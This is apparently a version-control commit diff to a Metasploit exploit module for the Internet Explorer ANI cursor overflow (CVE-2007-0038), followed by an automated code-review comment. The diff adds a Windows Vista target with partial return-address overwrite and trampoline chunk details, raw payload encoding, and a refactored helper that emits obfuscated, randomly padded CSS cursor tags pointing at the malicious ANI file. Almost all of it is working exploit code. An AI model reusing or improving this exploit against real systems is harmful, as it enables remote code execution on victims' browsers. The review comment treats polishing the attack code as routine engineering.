fixes for Vista, brute forcing
git-svn-id: file:///home/svn/framework3/trunk@4598 4d416f70-5f16-0410-b530-b9f4589650daunstable
parent
86f4bfd514
commit
6cfab21bcb
|
@ -96,18 +96,20 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
|
||||||
|
|
||||||
#
|
#
|
||||||
# Partial overwrite where 700b is a jmp dword [ebx] ebx points to the start
|
# Partial overwrite where 700b is a jmp dword [ebx] ebx points to the start
|
||||||
# of the RIFF itself.
|
# of the RIFF chunk itself. The length field of the RIFF chunk
|
||||||
|
# tag contains a short jump into an embedded riff chunk that
|
||||||
|
# makes a long relative jump into the actual payload.
|
||||||
#
|
#
|
||||||
|
[ 'Windows Vista user32.dll 6.0.6000.16386',
|
||||||
# The RIFF magic bytes and the size of the riff file are
|
{
|
||||||
# executed which then bounce through.
|
'Ret' => 0x700b,
|
||||||
#
|
'Len' => 2,
|
||||||
# 1. Partial overwrite return with the address of a jmp dword [ebx]
|
|
||||||
# 2. Executes the first few bytes of the RIFF chunk and then
|
# On Vista, the pages that contain the RIFF are read-only.
|
||||||
# does a jmp $+0x16
|
# In-place decoders cannot be used.
|
||||||
# 3. Executes a relative jump to the start of the payload
|
'EncoderType' => Msf::Encoder::Type::Raw
|
||||||
# itself.
|
}
|
||||||
[ 'Windows Vista user32.dll 6.0.6000.16386', { 'Ret' => 0x700b, 'Len' => 2 } ]
|
]
|
||||||
|
|
||||||
],
|
],
|
||||||
'DisclosureDate' => 'Mar 28 2007',
|
'DisclosureDate' => 'Mar 28 2007',
|
||||||
|
@ -144,29 +146,15 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
|
||||||
"</head><body>" + rand_text_alphanumeric(rand(128)+1)
|
"</head><body>" + rand_text_alphanumeric(rand(128)+1)
|
||||||
|
|
||||||
mytargs = (target.name =~ /All Targets/) ? targets : [target]
|
mytargs = (target.name =~ /All Targets/) ? targets : [target]
|
||||||
|
|
||||||
mytargs.each_index do |i|
|
if target.name =~ /All Targets/
|
||||||
|
targets.each_index { |i|
|
||||||
next if not mytargs[i].ret
|
next if not targets[i].ret
|
||||||
|
|
||||||
html << "<div style='" +
|
html << generate_div(gext, i)
|
||||||
generate_css_padding() +
|
}
|
||||||
Rex::Text.to_rand_case("cursor") +
|
else
|
||||||
generate_css_padding() +
|
html << generate_div(gext, target_index)
|
||||||
":" +
|
|
||||||
generate_css_padding() +
|
|
||||||
Rex::Text.to_rand_case("url(") +
|
|
||||||
generate_css_padding() +
|
|
||||||
'"' +
|
|
||||||
get_resource + '/' + rand_text_alphanumeric(rand(80)+16) + ".#{gext}" +
|
|
||||||
"?#{rand_text_alpha(rand(12)+1)}=#{i}" +
|
|
||||||
'"' +
|
|
||||||
generate_css_padding() +
|
|
||||||
");" +
|
|
||||||
generate_css_padding() +
|
|
||||||
"'>" +
|
|
||||||
generate_padding() +
|
|
||||||
"</div>"
|
|
||||||
end
|
end
|
||||||
|
|
||||||
html << "</body></html>"
|
html << "</body></html>"
|
||||||
|
@ -191,6 +179,27 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
|
||||||
handler(cli)
|
handler(cli)
|
||||||
end
|
end
|
||||||
|
|
||||||
|
def generate_div(gext, targ)
|
||||||
|
"<div style='" +
|
||||||
|
generate_css_padding() +
|
||||||
|
Rex::Text.to_rand_case("cursor") +
|
||||||
|
generate_css_padding() +
|
||||||
|
":" +
|
||||||
|
generate_css_padding() +
|
||||||
|
Rex::Text.to_rand_case("url(") +
|
||||||
|
generate_css_padding() +
|
||||||
|
'"' +
|
||||||
|
get_resource + '/' + rand_text_alphanumeric(rand(80)+16) + ".#{gext}" +
|
||||||
|
"?#{rand_text_alpha(rand(12)+1)}=#{targ}" +
|
||||||
|
'"' +
|
||||||
|
generate_css_padding() +
|
||||||
|
");" +
|
||||||
|
generate_css_padding() +
|
||||||
|
"'>" +
|
||||||
|
generate_padding() +
|
||||||
|
"</div>"
|
||||||
|
end
|
||||||
|
|
||||||
def generate_ani(payload, target)
|
def generate_ani(payload, target)
|
||||||
|
|
||||||
# Build the first ANI header
|
# Build the first ANI header
|
||||||
|
@ -208,10 +217,10 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
|
||||||
|
|
||||||
if (target.name =~ /Vista/)
|
if (target.name =~ /Vista/)
|
||||||
# Vista has ebp=80, eip=84
|
# Vista has ebp=80, eip=84
|
||||||
anih_b = anih_a + rand_text(84-anih_a.length)
|
anih_b = rand_text(84)
|
||||||
|
|
||||||
# Overwrite locals with invalid pointers
|
# Overwrite local counter variable and pointers
|
||||||
anih_b[68, 12] = [0x80000000 | rand(0xffffffff)].pack('V') * 3
|
anih_b[68, 12] = [0].pack('V') * 3
|
||||||
else
|
else
|
||||||
# XP/2K has ebp=76 and eip=80
|
# XP/2K has ebp=76 and eip=80
|
||||||
anih_b = anih_a + rand_text(80-anih_a.length)
|
anih_b = anih_a + rand_text(80-anih_a.length)
|
||||||
|
@ -226,6 +235,8 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
|
||||||
# Begin the ANI chunk
|
# Begin the ANI chunk
|
||||||
riff = "ACON"
|
riff = "ACON"
|
||||||
|
|
||||||
|
# Calculate the data offset for the trampoline chunk and add
|
||||||
|
# the trampoline chunk if we're attacking Vista
|
||||||
if target.name =~ /Vista/
|
if target.name =~ /Vista/
|
||||||
trampoline_doffset = riff.length + 8
|
trampoline_doffset = riff.length + 8
|
||||||
|
|
||||||
|
|
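Review bot: In the second hunk the `mytargs = (target.name =~ /All Targets/) ? targets : [target]` line survives as context, but nothing on the new side reads it — the new `if` branch iterates `targets.each_index` and the `else` branch passes `target_index` straight to `generate_div` — so it is now a dead local. Either delete that line, or keep it and have a single `mytargs.each_index { |i| ... html << generate_div(gext, i) }` loop serve both cases, which also evaluates the `/All Targets/` match once instead of twice. The enclosing method starts outside the hunk. The new `generate_div(gext, targ)` would also benefit from a one-line header such as `# Emit one cursor-loading <div>; targ is the index into targets, echoed back in the query string (presumably read by the request handler — confirm)`.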